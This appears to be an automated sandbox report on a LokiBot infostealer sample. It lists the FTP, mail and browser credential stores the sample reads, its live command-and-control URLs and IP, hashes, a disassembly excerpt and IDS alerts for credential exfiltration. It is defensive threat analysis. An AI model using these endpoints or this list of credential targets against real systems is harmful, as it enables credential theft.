Source: C:\Users\user\Desktop\EozUxz4ybi.exe	Key opened: HKEY_CURRENT_USER\Software\Martin Prikryl			Jump to behavior

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Users\user\Desktop\EozUxz4ybi.exe

File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data

Jump to behavior

Tries to harvest and steal ftp login credentials

Source: C:\Users\user\Desktop\EozUxz4ybi.exe	File opened: HKEY_CURRENT_USER\Software\Far2\Plugins\FTP\Hosts	Jump to behavior
Source: C:\Users\user\Desktop\EozUxz4ybi.exe	File opened: HKEY_CURRENT_USER\Software\NCH Software\ClassicFTP\FTPAccounts	Jump to behavior
Source: C:\Users\user\Desktop\EozUxz4ybi.exe	File opened: HKEY_CURRENT_USER\Software\FlashPeak\BlazeFtp\Settings	Jump to behavior
Source: C:\Users\user\Desktop\EozUxz4ybi.exe	File opened: HKEY_CURRENT_USER\Software\Far\Plugins\FTP\Hosts	Jump to behavior

Tries to steal Mail credentials (via file / registry access)

Source: C:\Users\user\Desktop\EozUxz4ybi.exe	Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities			Jump to behavior
Source: C:\Users\user\Desktop\EozUxz4ybi.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook			Jump to behavior

Tries to steal Mail credentials (via file registry)

Source: C:\Users\user\Desktop\EozUxz4ybi.exe	Code function: PopPassword		0_2_0040D069
Source: C:\Users\user\Desktop\EozUxz4ybi.exe	Code function: SmtpPassword		0_2_0040D069

Source: Yara match	File source: EozUxz4ybi.exe, type: SAMPLE
Source: Yara match	File source: 0.0.EozUxz4ybi.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.EozUxz4ybi.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000000.1442462044.0000000000415000.00000008.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2698843483.0000000000415000.00000004.00000001.01000000.00000005.sdmp, type: MEMORY

Remote Access Functionality

Yara detected Lokibot

Source: Yara match	File source: dump.pcap, type: PCAP
Source: Yara match	File source: 00000000.00000002.2698954196.000000000056E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: EozUxz4ybi.exe PID: 2884, type: MEMORYSTR
Source: Yara match	File source: EozUxz4ybi.exe, type: SAMPLE
Source: Yara match	File source: 0.0.EozUxz4ybi.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.EozUxz4ybi.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000000.1442462044.0000000000415000.00000008.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2698843483.0000000000415000.00000004.00000001.01000000.00000005.sdmp, type: MEMORY

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	Windows Management Instrumentation	1 DLL Side-Loading	1 Access Token Manipulation	1 Masquerading	2 OS Credential Dumping	11 Security Software Discovery	Remote Services	1 Email Collection	1 Encrypted Channel	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	Scheduled Task/Job	Boot or Logon Initialization Scripts	1 DLL Side-Loading	11 Virtualization/Sandbox Evasion	2 Credentials in Registry	11 Virtualization/Sandbox Evasion	Remote Desktop Protocol	1 Archive Collected Data	3 Ingress Tool Transfer	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	Logon Script (Windows)	1 Access Token Manipulation	Security Account Manager	1 Account Discovery	SMB/Windows Admin Shares	2 Data from Local System	2 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	1 Deobfuscate/Decode Files or Information	NTDS	1 System Owner/User Discovery	Distributed Component Object Model	Input Capture	112 Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	3 Obfuscated Files or Information	LSA Secrets	1 File and Directory Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	1 DLL Side-Loading	Cached Domain Credentials	3 System Information Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
EozUxz4ybi.exe	86%	Virustotal		Browse
EozUxz4ybi.exe	100%	ReversingLabs	Win32.Infostealer.LokiBot
EozUxz4ybi.exe	100%	Avira	TR/Crypt.XPACK.Gen
EozUxz4ybi.exe	100%	Joe Sandbox ML

Source	Detection	Scanner	Label	Link
http://94.156.177.41/simple/five/fre.php	100%	Avira URL Cloud	malware

Name	Malicious	Antivirus Detection	Reputation
http://kbfvzoboss.bid/alien/fre.php	false		high
http://alphastand.win/alien/fre.php	false		high
http://alphastand.trade/alien/fre.php	false		high
http://alphastand.top/alien/fre.php	false		high
http://94.156.177.41/simple/five/fre.php	true	Avira URL Cloud: malware	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://www.ibsensoftware.com/	EozUxz4ybi.exe	false		high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
94.156.177.41	unknown	Bulgaria		43561	NET1-ASBG	true

General Information

Joe Sandbox version:	42.0.0 Malachite
Analysis ID:	1588384
Start date and time:	2025-01-11 01:41:20 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 4m 15s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	6
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	EozUxz4ybi.exe renamed because original name is a hash value
Original Sample Name:	e33153e01680866631836ebb9e46efd2fbe07689c8a8655bedfc3f5dc059ea1f.exe
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winEXE@1/2@0/1
EGA Information:	Successful, ratio: 100%
HCA Information:	Successful, ratio: 100% Number of executed functions: 35 Number of non-executed functions: 6
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
Excluded IPs from analysis (whitelisted): 52.149.20.212, 20.12.23.50, 13.107.246.45
Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, d.3.0.0.0.0.0.0.0.0.0.0.0.0.0.0.7.0.0.0.8.0.4.0.0.3.0.1.3.0.6.2.ip6.arpa, fe3cr.delivery.mp.microsoft.com
Not all processes where analyzed, report is missing behavior information
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtQueryValueKey calls found.

Simulations

Behavior and APIs

Time	Type	Description
19:42:22	API Interceptor	131x Sleep call for process: EozUxz4ybi.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
94.156.177.41	oAUBqI6vQ7.exe	Get hash	malicious	Lokibot	Browse	94.156.177.41/simple/five/fre.php
	Quotation2025-0107pdf.exe	Get hash	malicious	Lokibot, PureLog Stealer	Browse	94.156.177.41/mars/five/fre.php
	ZsRFRjkt9q.exe	Get hash	malicious	Lokibot	Browse	94.156.177.41/alpha/five/fre.php
	0yWVteGq5T.exe	Get hash	malicious	Lokibot	Browse	94.156.177.41/simple/five/fre.php
	CLOSURE DATE FOR THE YEAR.exe	Get hash	malicious	Lokibot	Browse	94.156.177.41/kings/five/fre.php
	Order84746.exe	Get hash	malicious	Lokibot	Browse	94.156.177.41/davinci/five/fre.php
	FVR-N2411-07396.exe	Get hash	malicious	Lokibot, PureLog Stealer	Browse	94.156.177.41/soja/five/fre.php
	Scan copy.exe	Get hash	malicious	Lokibot, PureLog Stealer	Browse	94.156.177.41/simple/five/fre.php
	file.exe	Get hash	malicious	Lokibot	Browse	94.156.177.41/maxzi/five/fre.php
	Payment Advice.xls	Get hash	malicious	HTMLPhisher, Lokibot	Browse	94.156.177.41/simple/five/fre.php

Domains

⊘No context

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
NET1-ASBG	oAUBqI6vQ7.exe	Get hash	malicious	Lokibot	Browse	94.156.177.41
	IpykYx5iwz.exe	Get hash	malicious	Remcos, GuLoader	Browse	94.156.177.164
	QUOTATION-9044456778.pdf (83kb).com.exe	Get hash	malicious	PureLog Stealer, Quasar	Browse	94.156.177.117
	Fantazy.i486.elf	Get hash	malicious	Unknown	Browse	95.87.199.40
	Fantazy.x86_64.elf	Get hash	malicious	Unknown	Browse	93.123.77.220
	Kloki.arm7.elf	Get hash	malicious	Unknown	Browse	83.222.191.90
	Kloki.m68k.elf	Get hash	malicious	Unknown	Browse	83.222.191.90
	Kloki.x86_64.elf	Get hash	malicious	Unknown	Browse	83.222.189.67
	Kloki.x86.elf	Get hash	malicious	Unknown	Browse	83.222.190.214
	Kloki.arm4.elf	Get hash	malicious	Unknown	Browse	83.222.191.90

Process:	C:\Users\user\Desktop\EozUxz4ybi.exe
File Type:	very short file (no magic)
Category:	dropped
Size (bytes):	1
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3:U:U
MD5:	C4CA4238A0B923820DCC509A6F75849B
SHA1:	356A192B7913B04C54574D18C28D46E6395428AB
SHA-256:	6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
SHA-512:	4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
Malicious:	false
Reputation:	high, very likely benign file
Preview:	1

C:\Users\user\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-2246122658-3693405117-2476756634-1003\7ec63eecc011967c28496572961d2a7c_9e146be9-c76a-4720-bcdb-53011b87bd06

Download File

Process:	C:\Users\user\Desktop\EozUxz4ybi.exe
File Type:	data
Category:	dropped
Size (bytes):	47
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3::
MD5:	0D7DB7FF842F89A36B58FA2541DE2A6C
SHA1:	50F3B486F99FB22648D26870E7A5CBA01CAED3DA
SHA-256:	140EDA45FE001C0FE47EDD7FC509FF1882D46FBCB7C7437D893C1FB83012E433
SHA-512:	6E6570A7CC802760730DB659A4EDE4221AC2CD944F4B0D97B0A5C8A9F2A072899E3C3FC5DAC336B53F8ACCDE81CBEECA6C5998A1471A2F91EB60E3E13620368D
Malicious:	false
Reputation:	moderate, very likely benign file
Preview:	...............................................

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	6.34004264630834
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	EozUxz4ybi.exe
File size:	98'816 bytes
MD5:	e35101f489a8d1fd3b789335cbdde45d
SHA1:	011376368c334f83f335c486c322194e73bd6382
SHA256:	e33153e01680866631836ebb9e46efd2fbe07689c8a8655bedfc3f5dc059ea1f
SHA512:	568d9ddea6807a7bfb6901296cf15e417b5b9b3772b4ba69c435c2d8d20de203e050876b22a9920af6a3d8e792e7e1a569ab6e37e40d736b93ee5aada3ef3ba5
SSDEEP:	1536:6zvQSZpGS4/31A6mQgL2eYCGDwRcMkVQd8YhY0/EqnIzmd:hSHIG6mQwGmfOQd8YhY0/EKUG
TLSH:	ADA32942B2A5C030F7B74DB2BB73A5B7857E7C332D22C84E9352459A14215E1EB7AB13
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........x.....................K.K.............=2......................................=2......=2......Rich............PE..L.....lW...

File Icon


Icon Hash:	00928e8e8686b000

Static PE Info

General

Entrypoint:	0x4139de
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics:	TERMINAL_SERVER_AWARE
Time Stamp:	0x576C0885 [Thu Jun 23 16:04:21 2016 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	5
OS Version Minor:	1
File Version Major:	5
File Version Minor:	1
Subsystem Version Major:	5
Subsystem Version Minor:	1
Import Hash:	0239fd611af3d0e9b0c46c5837c80e09

Entrypoint Preview

Instruction
push ebp
mov ebp, esp
push ecx
and dword ptr [ebp-04h], 00000000h
lea eax, dword ptr [ebp-04h]
push esi
push edi
push eax
call 00007FC9CCFEF519h
push eax
call 00007FC9CCFEF4F6h
xor esi, esi
mov edi, eax
pop ecx
pop ecx
cmp dword ptr [ebp-04h], esi
jle 00007FC9CCFEF6D6h
push 004188BCh
push dword ptr [edi+esi*4]
call 00007FC9CCFE1BA5h
pop ecx
pop ecx
test eax, eax
je 00007FC9CCFEF6BDh
push 00002710h
call 00007FC9CCFE245Ah
pop ecx
inc esi
cmp esi, dword ptr [ebp-04h]
jl 00007FC9CCFEF68Eh
push 00000000h
call 00007FC9CCFEF4EEh
push 00000000h
call 00007FC9CCFEF802h
pop ecx
pop edi
xor eax, eax
pop esi
mov esp, ebp
pop ebp
retn 0010h
push ebp
mov ebp, esp
xor eax, eax
push eax
push eax
push E567384Dh
push eax
call 00007FC9CCFDEE49h
push dword ptr [ebp+08h]
call eax
pop ebp
ret
push ebp
mov ebp, esp
push esi
mov esi, dword ptr [ebp+08h]
test esi, esi
je 00007FC9CCFEF714h
push esi
call 00007FC9CCFE1970h
pop ecx
test eax, eax
je 00007FC9CCFEF709h
push esi
call 00007FC9CCFDF9ACh
pop ecx
test eax, eax
je 00007FC9CCFEF6FEh
mov eax, dword ptr [0049FDECh]
cmp dword ptr [ebp+10h], 00000000h
cmovne eax, dword ptr [ebp+10h]
push eax
push dword ptr [0049FDE8h]
call 00007FC9CCFE13A4h
push dword ptr [ebp+0Ch]
push dword ptr [0049FDE8h]
call 00007FC9CCFE1396h
push 00000000h
push 00000000h
push esi

Rich Headers

Programming Language:

[ C ] VS2008 SP1 build 30729
[ASM] VS2003 (.NET) build 3077
[ASM] VS2008 SP1 build 30729
[IMP] VS2008 SP1 build 30729
[C++] VS2013 UPD5 build 40629
[LNK] VS2013 UPD5 build 40629

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x18ed0	0x64	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x0	0x0
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x14000	0x13800	94fa411af1cc6bb168a3ea0e66e80f78	False	0.5685096153846154	data	6.49204829439013	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata	0x15000	0x5000	0x4200	6ada3db9ddb6e4994558f8fd80a5cd3f	False	0.3701467803030303	data	4.2685971103623865	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.data	0x1a000	0x86000	0x200	955b3a57edf41d6c47c7225e8d847f91	False	0.056640625	OpenPGP Public Key	0.32171607431271465	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.x	0xa0000	0x1000	0x200	b9e3e5990c2d44bf83df2063f8e8e2cb	False	0.21875	data	1.957748567000045	IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE

Imports

DLL	Import
WS2_32.dll	getaddrinfo, freeaddrinfo, closesocket, WSAStartup, socket, send, recv, connect
KERNEL32.dll	GetProcessHeap, HeapFree, HeapAlloc, SetLastError, GetLastError
ole32.dll	CoCreateInstance, CoInitialize, CoUninitialize
OLEAUT32.dll	VariantInit, SysFreeString, SysAllocString

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2025-01-11T01:42:20.817288+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.8	49704	94.156.177.41	80	TCP
2025-01-11T01:42:20.817288+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.8	49704	94.156.177.41	80	TCP
2025-01-11T01:42:20.817288+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.8	49704	94.156.177.41	80	TCP
2025-01-11T01:42:21.548499+0100	2024312	ET MALWARE LokiBot Application/Credential Data Exfiltration Detected M1	1	192.168.2.8	49704	94.156.177.41	80	TCP
2025-01-11T01:42:22.238848+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.8	49705	94.156.177.41	80	TCP
2025-01-11T01:42:22.238848+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.8	49705	94.156.177.41	80	TCP
2025-01-11T01:42:22.238848+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.8	49705	94.156.177.41	80	TCP
2025-01-11T01:42:22.950193+0100	2024312	ET MALWARE LokiBot Application/Credential Data Exfiltration Detected M1	1	192.168.2.8	49705	94.156.177.41	80	TCP
2025-01-11T01:42:23.040247+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.8	49706	94.156.177.41	80	TCP
2025-01-11T01:42:23.040247+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.8	49706	94.156.177.41	80	TCP
2025-01-11T01:42:23.040247+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.8	49706	94.156.177.41	80	TCP
2025-01-11T01:42:23.762234+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.8	49706	94.156.177.41	80	TCP
2025-01-11T01:42:23.762234+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.8	49706	94.156.177.41	80	TCP
2025-01-11T01:42:23.920673+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.8	49707	94.156.177.41	80	TCP
2025-01-11T01:42:23.920673+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.8	49707	94.156.177.41	80	TCP
2025-01-11T01:42:23.920673+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.8	49707	94.156.177.41	80	TCP
2025-01-11T01:42:24.642872+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.8	49707	94.156.177.41	80	TCP
2025-01-11T01:42:24.642872+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.8	49707	94.156.177.41	80	TCP
2025-01-11T01:42:25.197136+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.8	49708	94.156.177.41	80	TCP
2025-01-11T01:42:25.197136+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.8	49708	94.156.177.41	80	TCP
2025-01-11T01:42:25.197136+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.8	49708	94.156.177.41	80	TCP
2025-01-11T01:42:25.938002+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.8	49708	94.156.177.41	80	TCP
2025-01-11T01:42:25.938002+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.8	49708	94.156.177.41	80	TCP
2025-01-11T01:42:26.102355+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.8	49709	94.156.177.41	80	TCP
2025-01-11T01:42:26.102355+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.8	49709	94.156.177.41	80	TCP
2025-01-11T01:42:26.102355+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.8	49709	94.156.177.41	80	TCP
2025-01-11T01:42:26.818252+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.8	49709	94.156.177.41	80	TCP
2025-01-11T01:42:26.818252+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.8	49709	94.156.177.41	80	TCP
2025-01-11T01:42:26.968789+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.8	49710	94.156.177.41	80	TCP
2025-01-11T01:42:26.968789+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.8	49710	94.156.177.41	80	TCP
2025-01-11T01:42:26.968789+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.8	49710	94.156.177.41	80	TCP
2025-01-11T01:42:27.703027+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.8	49710	94.156.177.41	80	TCP
2025-01-11T01:42:27.703027+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.8	49710	94.156.177.41	80	TCP
2025-01-11T01:42:28.135810+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.8	49711	94.156.177.41	80	TCP
2025-01-11T01:42:28.135810+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.8	49711	94.156.177.41	80	TCP
2025-01-11T01:42:28.135810+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.8	49711	94.156.177.41	80	TCP
2025-01-11T01:42:28.855418+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.8	49711	94.156.177.41	80	TCP
2025-01-11T01:42:28.855418+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.8	49711	94.156.177.41	80	TCP
2025-01-11T01:42:29.019551+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.8	49712	94.156.177.41	80	TCP
2025-01-11T01:42:29.019551+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.8	49712	94.156.177.41	80	TCP
2025-01-11T01:42:29.019551+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.8	49712	94.156.177.41	80	TCP
2025-01-11T01:42:29.739177+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.8	49712	94.156.177.41	80	TCP
2025-01-11T01:42:29.739177+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.8	49712	94.156.177.41	80	TCP
2025-01-11T01:42:29.891718+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.8	49713	94.156.177.41	80	TCP
2025-01-11T01:42:29.891718+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.8	49713	94.156.177.41	80	TCP
2025-01-11T01:42:29.891718+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.8	49713	94.156.177.41	80	TCP
2025-01-11T01:42:30.609312+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.8	49713	94.156.177.41	80	TCP
2025-01-11T01:42:30.609312+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.8	49713	94.156.177.41	80	TCP
2025-01-11T01:42:31.084444+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.8	49714	94.156.177.41	80	TCP
2025-01-11T01:42:31.084444+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.8	49714	94.156.177.41	80	TCP
2025-01-11T01:42:31.084444+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.8	49714	94.156.177.41	80	TCP
2025-01-11T01:42:31.824610+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.8	49714	94.156.177.41	80	TCP
2025-01-11T01:42:31.824610+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.8	49714	94.156.177.41	80	TCP
2025-01-11T01:42:31.992422+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.8	49715	94.156.177.41	80	TCP
2025-01-11T01:42:31.992422+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.8	49715	94.156.177.41	80	TCP
2025-01-11T01:42:31.992422+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.8	49715	94.156.177.41	80	TCP
2025-01-11T01:42:32.733349+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.8	49715	94.156.177.41	80	TCP
2025-01-11T01:42:32.733349+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.8	49715	94.156.177.41	80	TCP
2025-01-11T01:42:32.889368+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.8	49716	94.156.177.41	80	TCP
2025-01-11T01:42:32.889368+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.8	49716	94.156.177.41	80	TCP
2025-01-11T01:42:32.889368+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.8	49716	94.156.177.41	80	TCP
2025-01-11T01:42:33.590744+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.8	49716	94.156.177.41	80	TCP
2025-01-11T01:42:33.590744+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.8	49716	94.156.177.41	80	TCP
2025-01-11T01:42:34.065163+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.8	49717	94.156.177.41	80	TCP
2025-01-11T01:42:34.065163+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.8	49717	94.156.177.41	80	TCP
2025-01-11T01:42:34.065163+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.8	49717	94.156.177.41	80	TCP
2025-01-11T01:42:34.808586+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.8	49717	94.156.177.41	80	TCP
2025-01-11T01:42:34.808586+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.8	49717	94.156.177.41	80	TCP
2025-01-11T01:42:34.969892+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.8	49718	94.156.177.41	80	TCP
2025-01-11T01:42:34.969892+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.8	49718	94.156.177.41	80	TCP
2025-01-11T01:42:34.969892+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.8	49718	94.156.177.41	80	TCP
2025-01-11T01:42:35.673992+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.8	49718	94.156.177.41	80	TCP
2025-01-11T01:42:35.673992+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.8	49718	94.156.177.41	80	TCP
2025-01-11T01:42:35.848202+0100	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.8	49720	94.156.177.41	80	TCP
2025-01-11T01:42:35.848202+0100	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.8	49720	94.156.177.41	80	TCP
2025-01-11T01:42:35.848202+0100	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.8	49720	94.156.177.41	80	TCP
2025-01-11T01:42:36.597333+0100	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.8	49720	94.156.177.41	80	TCP
2025-01-11T01:42:36.597333+0100	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.8	49720	94.156.177.41	80	TCP
